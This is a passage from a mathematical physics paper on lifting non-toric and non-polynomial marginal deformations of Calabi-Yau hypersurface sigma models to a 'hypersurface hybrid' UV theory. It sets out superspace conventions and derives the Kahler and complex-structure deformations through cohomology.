9]: in general when \(X\) is obtained as such as space, only a subset of deformations of complex structure is obtained from deformations of the defining polynomial equations. This subset is exactly the set that has a good presentation in a corresponding linear sigma model, and we are then faced with a general question: can we describe the remaining deformations in terms of the fields of the UV theory? We will describe a solution to this problem relevant to another large class of Calabi-Yau compactifications: hypersurfaces in toric varieties. These manifolds were introduced by Batyrev in the context of mirror symmetry [10] and subsequently generalized to complete intersections in toric varieties [11]. These models have a simple gauged linear sigma model presentation [12], and their moduli spaces give a precise distinction between those moduli with a simple UV lift, and those that do not have such a lift. Explicitly, the moduli space of the SCFT is locally a product of two special Kahler manifolds \(\mathcal{M}^{\rm ac}\times\mathcal{M}^{\rm cc}\), with the first factor describing the complexified Kahler deformations associated to the (a,c) ring of the SCFT, while the second factor describes the complex structure deformations associated to the (c,c) ring of the SCFT. There is then a canonical identification between the tangent spaces to these with cohomology groups on \(X\): \[T_{\mathcal{M}^{\rm ac}} \simeq H^{1}(X,\Omega^{1}_{X})\, T_{\mathcal{M}^{\rm cc}} \simeq H^{1}(X,T_{X}). \tag{1}\] Here \(T_{X}\) is the (holomorphic) tangent sheaf on \(X\), while \(\Omega^{1}_{X}\) is its dual, which can also be thought of as the sheaf of (1,0)-forms on \(X\). The dimensions of the spaces are then given by \[\dim\mathcal{M}^{\rm ac} =h^{1}(X,\Omega^{1}_{X})=h^{1,1}(X)\, \dim\mathcal{M}^{\rm ac} =h^{1}(X,T_{X})=h^{1,2}(X). \tag{2}\] Furthermore, there is a decomposition [10; 13], nicely reviewed in [14], \[h^{1,1}(X) =h^{1,1}_{\rm toric}(X)+h^{1,1}_{\rm non-toric}(X)\, h^{1,2}(X) =h^{1,2}_{\rm poly}(X)+h^{1,2}_{\rm non-poly}(X). 
\tag{3}\] The first term in each equation has a straightforward interpretation in the gauged linear sigma model: each "toric" deformation can be understood as a deformation of the complexified Fayet-Iliopoulos parameters encoded in the twisted chiral superpotential, while each polynomial deformation can be understood as a deformation of the chiral superpotential determined by the defining equation of the hypersurface. In (2,2) SCFTs the decompositions turn out to be mirror-symmetric, i.e. mirror symmetry exchanges the toric deformations of the original theory with the polynomial deformations of the mirror.1 On the other hand, the remaining deformations do not have a simple UV description. Footnote 1: This is not preserved by (0,2) marginal supersymmetric deformations [15; 16]. There are several ways to address this issue. The most pragmatic is simply to stick to examples where the non-toric and non-polynomial deformations are absent. This is for example done in the CICY literature by restricting to what are termed "favorable" configurations. On the other hand, if one's interest is in a particular \(X\), then one may try to find a more general construction that presents \(X\) as a complete intersection in some other variety where the analogues of the non-toric and non-polynomial deformations are absent. An early approach of this sort was made in [17]; the more recent construction of "generalized CICYs" [18] offers another set of promising candidates for finding such generalizations. However in general it is not obvious how to construct such a desired UV theory given a particular \(X\). In addition, there is an important question of principle. Given an RG flow from a (2,2) UV theory to the SCFT we can ask whether it is possible to describe marginal operators in the SCFT in terms of operators constructed from the UV fields based on a classical Lagrangian. We know that in general this is too much to ask: for example, a classical field theorist equipped with the Lagrangian of a compact boson will be hard-pressed to discover the marginal operators that exist at the self-dual radius! However, we can hope that the situation is under better control when the flow leads to a weakly-coupled large radius non-linear sigma model with target space \(X\), and we will see our hope borne out, so that we will be able to present candidate operators in the chiral algebra of a UV theory that describe the full set of marginal deformations of the IR SCFT. We term the UV theory we study a "hypersurface hybrid theory."2 Such a theory arises as a phase in the gauged linear sigma model for a hypersurface \(X\) in a toric variety \(V\), and it can be formally obtained by taking the linear sigma model deep in a geometric phase and sending the gauge coupling to infinity while keeping the chiral superpotential couplings finite. The result is a non-linear sigma model with target space \(Y\), the total space of the canonical bundle \({\cal O}_{V}(K_{V})\to V\) equipped with a chiral superpotential \({\cal W}=\Phi P\), where \(\Phi\) is the distinguished fiber coordinate, and \(P\) is a section of the anticanonical bundle \({\cal O}_{V}(-K_{V})\to V\) chosen to be suitably generic so that \(X=\{P=0\}\subset V\) is a smooth manifold. We can think of this theory as an example of a hybrid theory, such as those introduced in [22] and recently studied in a number of works including [23]. 
A generic hybrid theory is constructed as a fibration of a (2,2) Landau-Ginzburg theory over a suitable base manifold \(V\), where the Landau-Ginzburg fields are sections of certain vector bundles over \(V\), while the Landau-Ginzburg superpotential varies holomorphically over the base. Our theory is a special and rather degenerate case, where the Landau-Ginzburg potential is linear in the fiber field. This means, for example, that we cannot think of the theory as a fibration of a _supersymmetric_ Landau-Ginzburg model on a curved base. A related property is that the introduction of the superpotential term decreases the value of the central charge, while in the hybrid theories considered in [22] the Landau-Ginzburg degrees of freedom made a non-negative contribution to the central charge. Nevertheless, we will see that much of the technology developed in [22] continues to apply in this case and gives a computable framework, in particular for the Ramond sector of the theory. Footnote 2: In some literature—for example [19; 20; 21]—these theories are referred to as Landau-Ginzburg models. We choose not to use that terminology to emphasize the significant differences between a Landau-Ginzburg theory and a curved non-linear sigma model. Our central result is to find explicit representatives for non-toric and non-polynomial deformations of the SCFT in the chiral algebra of the theory: the cohomology of the right-moving supercharge, or, in a superfield formulation, the cohomology of the super-covariant derivative \(\overline{\cal D}\), which we denote by \({\cal H}_{\overline{\cal D}}\). Working in the classical UV theory we obtain subspaces \({\cal H}_{\overline{\cal D}}^{\rm ac}\) and \({\cal H}_{\overline{\cal D}}^{\rm cc}\) which we expect to flow to marginal (a,c) and (c,c) operators in the SCFT. While already solving a problem in principle, we primarily view this result as a positive step in providing a similar description of deformations at the level of the gauged linear sigma model. The rest of the note is organized as follows: we introduce some (2,2) superspace notation in section 2 and then apply it to give a large radius description of deformations in a compact Calabi-Yau non-linear sigma model. Next we give a discussion of deformations of a hypersurface \(X\) in \(V\) in terms of algebraic geometry and phrase the non-toric and non-polynomial deformations solely in terms of properties of algebraic geometry of \(V\). Our key results are then obtained in section 4, where we lift these deformations to the hypersurface hybrid based on the non-linear sigma model with target space \(Y\). In section 5 we re-examine the marginal deformations by studying the NS-R sector of the theory via the techniques of [22] and reproduce the results obtained in previous sections. We conclude with a discussion of future directions. IVM's work is supported in part by the Humboldt Research Award as well as the Educational Leave program at James Madison University. Our work on this project was also supported by the NSF Grant PHY-1914505. We thank P. Aspinwall and R. Plesser for useful discussions. IVM acknowledges an ancient collaboration with B. Wurm that attempted to tackle some closely related questions. ## 2 Warm up: deformations of Calabi-Yau non-linear sigma models In this section we set out the notation that we will use in the rest of our note, and we will illustrate the basic ideas in the familiar setting of the chiral algebra of a large radius compact Calabi-Yau manifold. 
Additional details may be found in, for example, [6; 22]. ### Superspace conventions Our conventions for superspace are those of [6]. We work in Euclidean signature on a flat worldsheet \(\Sigma=\mathbb{C}\) and (2,2) superspace coordinates \((z,\theta^{\prime},\overline{\theta}^{\prime};\overline{z},\theta,\overline{ \theta})\). Using the short-hand notation \(\partial_{z}=\frac{\partial}{\partial z}\) and \(\bar{\partial}_{\overline{z}}=\frac{\partial}{\partial\overline{z}}\), a representation of the right-moving (or anti-holomorphic) supersymmetry algebra is furnished by the antiholomorphic superspace derivatives and supercharge operators \[\mathcal{D} =\partial_{\theta}+\overline{\theta}\bar{\partial}_{\overline{z }}\;, \mathcal{Q} =\partial_{\theta}-\overline{\theta}\bar{\partial}_{\overline{z }}\;,\] \[\overline{\mathcal{D}} =\partial_{\overline{\theta}}+\theta\bar{\partial}_{\overline{ z}}\;, \overline{\mathcal{Q}} =\partial_{\overline{\theta}}-\theta\bar{\partial}_{\overline{z }}\;. \tag{1}\] The non-trivial anti-commutators for these are \(\{\mathcal{D},\overline{\mathcal{D}}\}=2\bar{\partial}_{\overline{z}}\) and \(\{\mathcal{Q},\overline{\mathcal{Q}}\}=-2\bar{\partial}_{\overline{z}}\). We also have their "holomorphic" versions \[\mathcal{D}^{\prime} =\partial_{\theta^{\prime}}+\overline{\theta}^{\prime}\partial_ {z}\, \mathcal{Q}^{\prime} =\partial_{\theta^{\prime}}-\overline{\theta}^{\prime}\partial_ {z}\,\] \[\overline{\mathcal{D}}^{\prime} =\partial_{\overline{\theta}^{\prime}}+\theta^{\prime}\partial_ {z}\, \overline{\mathcal{Q}}^{\prime} =\partial_{\overline{\theta}^{\prime}}-\theta^{\prime}\partial_ {z}\, \tag{2}\] which have non-trivial anti-commutators \(\{\mathcal{D}^{\prime},\overline{\mathcal{D}}^{\prime}\}=2\partial_{z}\) and \(\{\mathcal{Q}^{\prime},\overline{\mathcal{Q}}^{\prime}\}=-2\partial_{z}\). We will be working with Lagrangian field theories based on bosonic chiral superfields \(\mathcal{Y}^{\alpha}\), which satisfy the constraints \[\overline{\mathcal{D}}\mathcal{Y}^{\alpha} =0\, \overline{\mathcal{D}}^{\prime}\mathcal{Y}^{\alpha} =0\, \tag{3}\] as well as their anti-chiral charge-conjugates \(\overline{\mathcal{Y}}^{\alpha}\), which are annihilated by \(\mathcal{D}\) and \(\mathcal{D}^{\prime}\). These fields have superspace expansions \[\mathcal{Y}^{\alpha} =y^{\alpha}+\cdots\, \overline{\mathcal{Y}}^{\overline{\alpha}} =\overline{y}^{\overline{\alpha}}+\cdots\, \tag{4}\] and the bosonic fields \(y^{\alpha}(z,\overline{z})\) and \(\overline{y}^{\overline{\alpha}}(z,\overline{z})\) take values in a Kahler manifold \(Y\)--the target space of the non-linear sigma model. Denoting the embedding map as \(f:\Sigma\to Y\), the superfields \(\mathcal{D}\mathcal{Y}^{\alpha}\) and \(\overline{\mathcal{D}\mathcal{Y}}^{\overline{\alpha}}\) have spin \(-1/2\) and take values in pullback bundles \(f^{*}(T_{Y})\) and \(f^{*}(\overline{T}_{Y})\) respectively.3 In what follows we will lighten notation and not write the explicit pullback by the map \(f\). The superfields \(\mathcal{D}^{\prime}\mathcal{Y}^{\alpha}\) and \(\overline{\mathcal{D}}^{\prime}\overline{\mathcal{Y}}^{\overline{\alpha}}\) are valued in the same bundles as their anti-holomorphic counter-parts but carry spin \(+1/2\). This geometric structure allows us to formulate the action and path integral of the non-linear sigma model. 
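As a quick check of these conventions, the only non-trivial Grassmann brackets among the ingredients of the antiholomorphic derivatives and supercharges are \(\{\partial_{\theta},\theta\}=1\) and \(\{\partial_{\overline{\theta}},\overline{\theta}\}=1\), so that \[\{\mathcal{D},\overline{\mathcal{D}}\}=\{\partial_{\theta}+\overline{\theta}\bar{\partial}_{\overline{z}},\ \partial_{\overline{\theta}}+\theta\bar{\partial}_{\overline{z}}\}=\{\partial_{\theta},\theta\}\bar{\partial}_{\overline{z}}+\{\overline{\theta},\partial_{\overline{\theta}}\}\bar{\partial}_{\overline{z}}=2\bar{\partial}_{\overline{z}}\,\] while the relative signs in \(\mathcal{Q}\) and \(\overline{\mathcal{Q}}\) flip the result to \(-2\bar{\partial}_{\overline{z}}\); the holomorphic operators work in the same way with \(\bar{\partial}_{\overline{z}}\) replaced by \(\partial_{z}\). 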
Given a cover \(\{\mathfrak{U}_{a}\}_{a\in I}\) of \(Y\) with holomorphic transition functions relating the coordinates in overlapping patches \(\mathfrak{U}_{a}\cap\mathfrak{U}_{b}\neq\emptyset\) as \(y^{\alpha}_{a}=F^{\alpha}_{ab}(y_{b})\), the superfields of the theory transform accordingly: Footnote 3: More precisely, these superfields take values in appropriate pullbacks of the target space tangent bundle \(T_{Y}\) tensored with a spin bundle on the worldsheet. For example, \(\mathcal{D}\mathcal{Y}^{\alpha}\) is a section of \(f^{*}(T_{Y})\otimes\overline{K}^{1/2}_{\Sigma}\). In our case the canonical bundle \(K_{\Sigma}\) and its conjugate \(\overline{K}_{\Sigma}\) are trivial, and so are the spin bundles. The spin bundles play an important role when we place the theory on a curved worldsheet, when we consider topologically non-trivial field configurations, or when we perform a topological twist to obtain a cohomological topological field theory see, e.g. [4, 24]. These subtleties will not play a role in our classical considerations, and we will just keep track of the spin eigenvalues. \[\mathcal{Y}^{\alpha}_{a} =F^{\alpha}_{ab}(\mathcal{Y}_{b})\, \overline{\mathcal{Y}}^{\overline{\alpha}}_{a} =\overline{F}^{\alpha}_{ab}(\mathcal{Y}_{b})\, \tag{5}\] and the superspace derivatives transform covariantly. For example, \[(\mathcal{D}\mathcal{Y}^{\alpha})_{a} =\frac{\partial F^{\alpha}_{ab}}{\partial\mathcal{Y}^{\beta}_{b} }(\mathcal{D}\mathcal{Y}^{\beta})_{b}. \tag{6}\] Note that this implies that the higher order terms in the \(\theta,\theta^{\prime}\) expansion of the superfields pick up connection terms in their transformations. This is a familiar feature of superspace [25, 26]. Before we proceed further we will fix some notation for a holomorphic vector bundle \(\mathcal{E}\) over a Kahler manifold \(Y\) of dimension \(d\). We denote the dual bundle by \(\mathcal{E}^{*}\), and the complex conjugate bundle by \(\overline{\mathcal{E}}\). We denote by \(\mathcal{A}^{p,q}_{Y}(\mathcal{E})\) the vector space of sections of (p,q) forms on \(Y\) valued in \(\mathcal{E}\). The vector space of (p,q) forms on \(Y\) will just be denoted by \(\mathcal{A}^{p,q}_{Y}\). Although we will primarily work in the smooth category, it will be useful for us to think of the bundles as sheaves. We will denote by \(\mathcal{O}_{Y}\) the structure sheaf on \(Y\), \(T_{Y}\) will be the tangent sheaf, and \(\Omega^{p}_{Y}\) the sheaf of \((p,0)\)-forms; of course \(\Omega^{1}_{Y}=T^{*}_{Y}\). \(K_{Y}\) denotes the canonical divisor on \(Y\). For all examples we consider \(K_{Y}\) will be Cartier, so that \(\mathcal{O}_{Y}(K_{Y})\simeq\Omega^{d}_{Y}\) is the canonical bundle. When \(Y\) is compact and smooth we will frequently make use of the isomorphism between Dolbeault and Cech cohomology groups \(H^{p,q}_{\bar{\partial}}(Y,\mathcal{E})\simeq H^{q}(Y,\Omega^{p}_{Y}\otimes \mathcal{E})\). The former naturally show up in the physical theory, while the latter are computationally more accessible. ### The action and its key symmetries To write down an explicit action, we fix a Kahler metric \(\mathcal{G}\) on \(Y\), locally given by a Kahler potential \(\mathcal{K}\). It is also possible to include the coupling to a closed \(B\)-field, but this will not play a role in our classical discussion. If \(Y\) is non-compact and admits a global holomorphic function \(\mathcal{W}(\mathcal{Y})\), then we can also add a chiral superpotential term to the action. 
Letting \(m\) be a parameter with units of mass, the standard 2-derivative action with a chiral superpotential is \[S=S_{\text{kin}}+S_{\text{pot}}\, \tag{7}\] with \[S_{\text{kin}} =\tfrac{1}{4\pi}\int d^{2}z\underbrace{\mathcal{D}\overline{ \mathcal{D}}\overline{\mathcal{D}}^{\prime}\mathcal{D}^{\prime}}_{=\mathcal{D} _{\text{tot}}}\left[\tfrac{1}{2}\mathcal{K}(\mathcal{Y},\overline{\mathcal{Y} })\right]\, S_{\text{pot}} =\tfrac{m}{4\pi}\int d^{2}z\,\mathcal{D}\mathcal{D}^{\prime} \mathcal{W}(\mathcal{Y})+\text{h.c}. \tag{8}\] It is understood that the Grassmann coordinates \(\theta,\theta^{\prime}\) and their conjugates are to be set to zero after all of the superspace derivatives are taken. While the kinetic term is defined only patch by patch, the action is nevertheless well-defined since Kahler transformations give rise to terms annihilated by the superspace derivatives. Moreover, because the fermion couplings are non-chiral the action and the path integral are invariant under (complex) diffeomorphisms, which allows both to be well-defined despite the curvature of the target space. As we will be mostly concerned with aspects of the classical field theory, the equations motion will play an important role. In superspace these take the form \[\overline{\mathcal{D}}^{\prime}\overline{\mathcal{D}}\overline{ \mathcal{Y}}^{\overline{\beta}} =-\overline{\Gamma}^{\overline{\beta}}_{\overline{\alpha}\overline {\gamma}}\overline{\mathcal{D}}^{\prime}\overline{\mathcal{Y}}^{\overline{ \alpha}}\overline{\mathcal{D}}\overline{\mathcal{Y}}^{\overline{\gamma}}+2m \mathcal{G}^{\overline{\beta}\alpha}\mathcal{W}_{\alpha}\,\] \[\mathcal{D}^{\prime}\mathcal{D}\mathcal{Y}^{\alpha} =-\Gamma^{\alpha}_{\beta\gamma}\mathcal{D}^{\prime}\mathcal{Y}^{ \beta}\mathcal{D}\mathcal{Y}^{\gamma}-2m\overline{\mathcal{W}}_{\overline{ \alpha}}\mathcal{G}^{\overline{\alpha}\alpha}. \tag{9}\] Here \(\mathcal{G}^{\overline{\beta}\alpha}\) denotes the inverse Kahler metric, while \(\Gamma\) and \(\overline{\Gamma}\) are the Chern connections on \(T_{Y}\) and \(\overline{T}_{Y}\) respectively: \[\Gamma^{\alpha}_{\beta\gamma} =\mathcal{G}^{\overline{\alpha}\alpha}\mathcal{G}_{\beta\overline {\alpha},\gamma}\, \overline{\Gamma}^{\overline{\alpha}}_{\overline{\beta}\overline{ \gamma}} =\mathcal{G}^{\overline{\alpha}\alpha}\mathcal{G}_{\alpha\overline{ \beta},\overline{\gamma}}. \tag{10}\] The notation \(\mathcal{W}_{\alpha}\) is a short-hand for the components of \(\partial\mathcal{W}=\frac{\partial W}{\partial y^{\alpha}}dy^{\alpha}\), and similarly \(\overline{\mathcal{W}}_{\overline{\alpha}}\) denote the components of \(\bar{\partial\mathcal{W}}\).4 We will find another form of the equations of motion useful as well: Footnote 4: Our notation for the spacetime Dolbeault differential operators \(\partial\) and \(\bar{\partial}\), with \(\text{d}=\partial+\bar{\partial}\) is close to the world-sheet derivatives \(\partial_{z}\) and \(\bar{\partial}\overline{r}\); we hope the subscripts on the latter will lessen the confusion. \[\overline{\mathcal{D}}\,\overline{\mathcal{D}}^{\prime}\mathcal{K}_{ \alpha} =-2m\mathcal{W}_{\alpha}\, \mathcal{D}\mathcal{D}^{\prime}\mathcal{K}_{\overline{\alpha}} =2m\overline{\mathcal{W}}_{\overline{\alpha}}. \tag{11}\] Here again \({\cal K}_{\alpha}=\frac{\partial{\cal K}}{\partial y^{\alpha}}\), and \({\cal K}_{\overline{\alpha}}=\frac{\partial{\cal K}}{\partial\overline{y}^{ \overline{\alpha}}}\). 
In this notation the Kahler metric is \({\cal G}_{\alpha\overline{\beta}}={\cal K}_{\alpha\overline{\beta}}\). When \({\cal W}=0\) the action has a classical \(\mathrm{U}(1)_{\mathrm{L}}\times\mathrm{U}(1)_{\mathrm{R}}\) global R-symmetry with the following action: \[\begin{array}{ccccc}\theta^{\prime}&\overline{\theta}^{\prime}&\theta& \overline{\theta}&{\cal Y}^{\alpha}\\ \mathrm{U}(1)_{\mathrm{L}}&+1&-1&0&0&0\\ \mathrm{U}(1)_{\mathrm{R}}&0&0&+1&-1&0\end{array} \tag{12}\] These symmetries are chiral and in general anomalous, and the anomaly is proportional to \(c_{1}(T_{Y})\). However, we will insist that the canonical bundle of \(Y\) is trivial, i.e. \({\cal O}_{Y}(K_{Y})={\cal O}_{Y}\), which implies \(c_{1}(T_{Y})=0\). While the superpotential in general breaks the symmetry, if \(Y\) and \({\cal K}\) admit a holomorphic Killing vector \(v\) such that the Lie derivative with respect to \(v\) preserves the superpotential, i.e. \({\cal L}_{v}{\cal W}={\cal W}\), then the action will preserve a modified \(\mathrm{U}(1)_{\mathrm{L}}\times\mathrm{U}(1)_{\mathrm{R}}\) symmetry, which has the infinitesimal action \[\delta\theta^{\prime}=i\alpha_{\mathrm{L}}\theta^{\prime}\,\qquad\qquad \delta\theta=i\alpha_{\mathrm{R}}\theta\,\qquad\qquad\delta{\cal Y}^{\alpha}=i \alpha_{\mathrm{L}}{\cal L}_{v}{\cal Y}^{\alpha}+i\alpha_{\mathrm{R}}{\cal L}_ {v}{\cal Y}^{\alpha}. \tag{13}\] In all of our theories the symmetries will be compact and turn out to act with integral charges on a natural basis of the fields. These symmetries will be crucial in making the connection between the UV theory and the IR SCFT. In particular, we will assume that these symmetries flow to the \(\mathrm{U}(1)_{\mathrm{L}}\times\mathrm{U}(1)_{\mathrm{R}}\) R-symmetries of the (2,2) superconformal algebra. This seems to be a sound assumption for flows to compact and unitary (2,2) SCFTs, made implicitly or explicitly in most Lagrangian constructions of such theories. In the more general case of (0,2) supersymmetric flows the circumstances when this assumption is justified remain to be understood [27]. ### A view of Calabi-Yau deformations In this section we develop some of the main tools that we will use in our study of marginal deformations in a particularly well-understood context: the deformations of the SCFT associated to a smooth compact Calabi-Yau manifold \(Y\) based on a large-radius non-linear sigma model description. Our perspective is particularly inspired by [28], as well as observations on conformal perturbation theory such as those given in [29] in a four-dimensional context. Before proceeding, we fix our definition of a compact Calabi-Yau manifold as a smooth Kahler manifold \(Y\), \(\dim_{\mathbb{C}}Y=d\), with trivial canonical bundle and \(H^{i}(Y,{\cal O}_{Y})=0\) for \(0<i<d-1\). The last condition excludes cases such as \(T^{6}\) or \(\mathrm{K}3\times T^{2}\) : there is a good physical reason to do this, since in those cases the superconformal algebra is enhanced, which leads to a different structure of the moduli space of marginal deformations. A recent discussion of the SCFT moduli space in this enhanced context can be found in [30]. 
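It may be worth noting that, since \(K_{Y}\) is trivial, Serre duality gives \(H^{i}(Y,{\cal O}_{Y})\simeq H^{d-i}(Y,{\cal O}_{Y})^{*}\), so the condition above also forces \(H^{d-1}(Y,{\cal O}_{Y})=0\); for a threefold it simply says \(h^{1,0}(Y)=h^{2,0}(Y)=0\), which holds for the quintic but fails for \(T^{6}\) and \(\mathrm{K}3\times T^{2}\). 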
With these definitions fixed, we consider the perspective of conformal perturbation theory: the marginal deformations of a (2,2) superconformal theory are encoded in the deforma tion of an "action"5 Footnote 5: This does not require a Lagrangian definition of the SCFT: more generally \(\Delta S\) is used to define (after suitable regularization and renormalization) the perturbed correlation functions via \(\langle\cdots e^{-\Delta S}\rangle\). \[\Delta S_{\rm CFT}=\int d^{2}z\,{\cal D}\overline{\cal D}^{\prime}\widetilde{ \Psi}(z,\overline{z})+\int d^{2}z\,{\cal D}{\cal D}^{\prime}\Psi\ +{\rm h.c.}, \tag{14}\] where \(\widetilde{\Psi}\) is an (a,c) field with \({\rm U}(1)_{\rm L}\times{\rm U}(1)_{\rm R}\) charges \((-1,1)\), while \(\Psi\) is a (c,c) field with \({\rm U}(1)_{\rm L}\times{\rm U}(1)_{\rm R}\) charges \((1,1)\). When working in a large radius limit, meaning the typical length scale of the compactification geometry is much larger than the string length, we should be able to use the non-linear sigma model fields to describe the spectrum of (a,c) and (c,c) operators and the associated (infinitesimal) deformations, and we will reproduce the familiar results relating the space of infinitesimal deformations to Dolbeault cohomology on \(Y\): \[T_{{\cal M}^{\rm cc}}\simeq H^{0,1}_{\bar{\partial}}(Y,T_{Y})\,\qquad \qquad\qquad T_{{\cal M}^{\rm ac}}\simeq H^{0,1}_{\bar{\partial}}(Y,T^{*}_{Y}). \tag{15}\] We begin with the (a,c) deformations. The superfield \(\widetilde{\Psi}\) should have the following properties: 1. \(\widetilde{\Psi}\) is well-defined on the NLSM target space and is expressed in terms of the superfields \({\cal Y},\overline{\cal Y}\), and their superspace derivatives; 2. it has \({\rm U}(1)_{\rm L}\times{\rm U}(1)_{\rm R}\) charges \((-1,1)\); 3. it carries (classical) dimensions \((h_{\rm L},h_{\rm R})=(\frac{1}{2},\frac{1}{2})\); 4. \(\widetilde{\Psi}\) is twisted chiral up to the NLSM equations of motion. Denoting the space of \((p,q)\) forms on \(Y\) by \({\cal A}_{Y}^{p,q}\), we find that properties 1,2,3 imply \[\widetilde{\Psi}=\omega_{\alpha\overline{\beta}}{\cal D}^{\prime}{\cal Y}^{ \alpha}\overline{{\cal D}{\cal Y}}^{\overline{\beta}}+{\cal D}^{\prime} \overline{\cal D}f\, \tag{16}\] where \(\omega\in{\cal A}_{Y}^{1,1}\), and \(f\in{\cal A}_{Y}^{0,0}\). Property 4 holds if and only if \(d\omega=0\). Before we continue, we point out a frequent super-abuse of notation. We will often discuss a geometric quantity, for example the form \[\omega=\omega_{\alpha\overline{\beta}}(y,\overline{y})dy^{\alpha}\wedge d \overline{y}^{\overline{\beta}}\, \tag{17}\] that we will use to construct a superfield expression such as \(\widetilde{\Psi}\). In the latter it should be understood that we replace the coordinate dependence by the corresponding superfields, so that we should really write (already omitting the pullback to the worldsheet!) \[\widetilde{\Psi}=\omega_{\alpha\overline{\beta}}({\cal Y},\overline{\cal Y}){ \cal D}^{\prime}{\cal Y}^{\alpha}\overline{{\cal D}{\cal Y}}^{\overline{\beta }}+{\cal D}^{\prime}\overline{\cal D}f({\cal Y},\overline{\cal Y}). \tag{18}\] We will choose to leave this promotion of coordinates to superfields implicit rather than make the notation unreadable. Returning now to the \(\widetilde{\Psi}\), we see that the space of fields satisfying all of the requirements is infinite dimensional. 
To obtain a sensible description of the deformation space, we recall one more statement from conformal perturbation theory and Calabi-Yau NLSMs: a supersymmetric deformation of the theory by a global D-term of the form \[\Delta S_{D}=\int d^{2}z\,{\cal D}_{\rm tot}f\, \tag{2.19}\] amounts to a shift of the Kahler potential by a global function. We expect any such small perturbation to be marginally irrelevant, i.e. to lead to the same IR fixed point. This fits well with the statement in conformal perturbation theory that a supersymmetric D-term deformation of a compact unitary (2,2) SCFT is necessarily irrelevant.6 Footnote 6: This is a well-known statement—see, for example, [31, 32]. With this extra condition, we now observe that if \(\omega-\omega^{\prime}=\partial\bar{\partial}f\) for any function \(f\in{\cal A}^{0,0}(Y)\), then we expect \(\omega\) and \(\omega^{\prime}\) to lead to the same IR fixed point. Hence, the space of marginal (a,c) deformations is isomorphic to the quotient \[\{\omega\in{\cal A}^{1,1}_{Y}\ |\ d\omega=0\}/\{\omega=\partial\bar{\partial}f\ |\ f\in{\cal A}^{0,0}_{Y}\}. \tag{2.20}\] This is precisely the definition of the Bott-Chern cohomology group \(H^{1,1}_{\rm BC}(Y,\mathbb{C})\).7 Because \(Y\) is a compact Calabi-Yau space, it obeys the \(\partial\bar{\partial}\) lemma, and that in turn implies the isomorphism Footnote 7: A useful review of various cohomology theories on a complex manifold is given in [33]. \[H^{p,q}_{\rm BC}(Y,\mathbb{C})\simeq H^{p,q}_{\bar{\partial}}(Y). \tag{2.21}\] Taking the case of \(p=q=1\) and using \(H^{1,1}_{\bar{\partial}}(Y)\simeq H^{0,1}_{\bar{\partial}}(Y,\Omega^{1}_{Y})\), we recover the expected result for \(T_{{\cal M}^{\rm ac}}\). In the same spirit, we now tackle the (c,c) deformation. We seek fields \(\Psi\) with the following properties: 1. \(\Psi\) is well-defined on the NLSM target space and is expressed in terms of the superfields \({\cal Y},\overline{\cal Y}\), and their superspace derivatives; 2. it has \({\rm U}(1)_{\rm L}\times{\rm U}(1)_{\rm R}\) charges \(q_{\rm L}=+1\) and \(q_{\rm R}=+1\); 3. it carries (classical) dimensions \(h_{\rm L}=h_{\rm R}=\frac{1}{2}\); 4. \(\Psi\) is chiral up to the NLSM equations of motion. The first three properties then require \[\Psi=\omega_{\overline{\alpha}\overline{\beta}}\overline{\cal D}\,\overline{\cal Y}^{\overline{\alpha}}\overline{\cal D}^{\prime}\overline{\cal Y}^{\overline{\beta}}+\overline{\cal D}\,\overline{\cal D}^{\prime}f\, \tag{2.22}\] where \(\omega\in{\cal A}^{0,0}_{Y}(\bar{T}^{*}_{Y}\otimes\bar{T}^{*}_{Y})\), and \(f\in{\cal A}^{0,0}_{Y}\). Using the NLSM equations of motion, we find that the last requirement translates into two differential conditions that involve the Kahler connection, which we denote by \(\nabla\): \[\nabla_{\overline{\alpha}}\omega_{\overline{\gamma}\overline{\beta}}=\nabla_{\overline{\gamma}}\omega_{\overline{\alpha}\overline{\beta}}\,\qquad\nabla_{\overline{\beta}}\omega_{\overline{\alpha}\overline{\gamma}}=\nabla_{\overline{\gamma}}\omega_{\overline{\alpha}\overline{\beta}}. \tag{23}\] To solve these conditions it is convenient to define \(\eta^{\beta}_{\overline{\alpha}}=\omega_{\overline{\alpha}\overline{\beta}}\mathcal{G}^{\overline{\beta}\beta}\). 
The first differential condition is then equivalent to \(\bar{\partial}\eta=0\), while the second becomes \[\nabla_{\overline{\gamma}}\mu_{\overline{\alpha}\overline{\beta}}=0\, \tag{24}\] where \(\mu\in{\cal A}^{0,2}_{Y}\) is given by \[\mu_{\overline{\beta}\overline{\alpha}}={\cal G}_{\beta\overline{\beta}}\eta^{\beta}_{\overline{\alpha}}-{\cal G}_{\beta\overline{\alpha}}\eta^{\beta}_{\overline{\beta}}. \tag{25}\] The condition (24) is restrictive. If we use the metric to raise the indices and contract with the unique holomorphic \(d\)-form \(\Omega\), we obtain \[\widetilde{\mu}_{\beta_{1}\cdots\beta_{d-2}}=\mu_{\overline{\alpha}\overline{\beta}}\mathcal{G}^{\overline{\alpha}\alpha}\mathcal{G}^{\overline{\beta}\beta}\Omega_{\alpha\beta\beta_{1}\cdots\beta_{d-2}}\, \tag{26}\] and the condition on \(\mu\) is equivalent to \(\bar{\partial}\widetilde{\mu}=0\), i.e. \(\widetilde{\mu}\) defines a class in \(H^{d-2,0}_{\bar{\partial}}(Y,{\cal O}_{Y})\). This group is empty because \(Y\) is Calabi-Yau, which implies \(\widetilde{\mu}=0\). Because \(\Omega\) is non-degenerate, we conclude that \(\mu=0\) as well. So, the only way to satisfy our conditions is to solve \[\bar{\partial}\eta=0\,\qquad{\cal G}_{\beta\overline{\beta}}\eta^{\beta}_{\overline{\alpha}}-{\cal G}_{\beta\overline{\alpha}}\eta^{\beta}_{\overline{\beta}}=0. \tag{27}\] Let \(\eta\) be a representative of a cohomology class \([\eta]\in H^{0,1}_{\bar{\partial}}(Y,T_{Y})\). We will now show that we can always find another representative \[\widetilde{\eta}=\eta+\bar{\partial}\lambda \tag{28}\] for some \(\lambda\in{\cal A}^{0,0}_{Y}(T_{Y})\) such that \(\widetilde{\eta}\) satisfies the second condition in (27). We need to find \(\lambda\) such that \[\nabla_{\overline{\beta}}\lambda^{\beta}{\cal G}_{\beta\overline{\alpha}}-\nabla_{\overline{\alpha}}\lambda^{\beta}{\cal G}_{\beta\overline{\beta}}={\cal G}_{\beta\overline{\beta}}\eta^{\beta}_{\overline{\alpha}}-{\cal G}_{\beta\overline{\alpha}}\eta^{\beta}_{\overline{\beta}}. \tag{29}\] Using \(\bar{\partial}\eta=0\) it is not hard to show that the right-hand side is a \(\bar{\partial}\)-closed (0,2) form. On \(Y\) any such form is \(\bar{\partial}\)-exact, so that there exists some (0,1) form \(\rho\) such that \[{\cal 